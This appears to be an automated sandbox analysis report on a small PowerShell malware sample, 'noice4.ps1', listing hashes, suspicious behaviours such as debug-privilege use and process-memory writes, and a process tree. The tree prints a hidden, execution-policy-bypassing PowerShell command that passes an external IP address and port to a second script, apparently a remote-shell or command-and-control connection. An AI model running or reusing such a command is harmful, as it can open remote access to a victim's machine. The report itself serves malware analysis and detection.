Analysis
-
max time kernel
129s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06/01/2023, 17:45
Static task
static1
Behavioral task
behavioral1
Sample
noice4.ps1
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
noice4.ps1
Resource
win10v2004-20220812-en
General
-
Target
noice4.ps1
-
Size
94B
-
MD5
51c4f114929cc36620c003400c527699
-
SHA1
4596e158498d5c9ff4aa694885122a3867a4592f
-
SHA256
90cb3c97c0d80649d704e7fb0f171f84cc876cc2016b5bbd8a232341ef59890c
-
SHA512
24f329d481a939d143a9ad8a20c8d2e22b55e5cf0150d3e0600f813f5cacbf86022ef8e46f1e4c3deb6cf59f5f2e6c0081d2f2f3e14bfc5b03c09b92f3294869
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1084 powershell.exe 1084 powershell.exe 1940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1084 wrote to memory of 1940 1084 powershell.exe 80 PID 1084 wrote to memory of 1940 1084 powershell.exe 80
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\noice4.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File .\noice2.ps1 139.162.195.82 80802⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cd488961db34aaa8ef3178208699448e
SHA1a32ca7998015f97e09c1245bed2791e9c0ec81f9
SHA25659804d7599fb39235424f498e5fa4cd2434b2a924f37d60f842ea4a536e390ad
SHA51259ab7742cb29fa66c86b3ebe63605de647b4e1d874523eb95dac2d4c8db88c65afb906315fe43ebe69bbe2b9087cf4ffea977605aac7d2eb39fbf698ee0c005e
-
Filesize
944B
MD5a316ebd4efa11d6b6daf6af0cc1aebce
SHA1ab338dd719969c70590dbc039b90e2758c741762
SHA256f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014
SHA51267a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a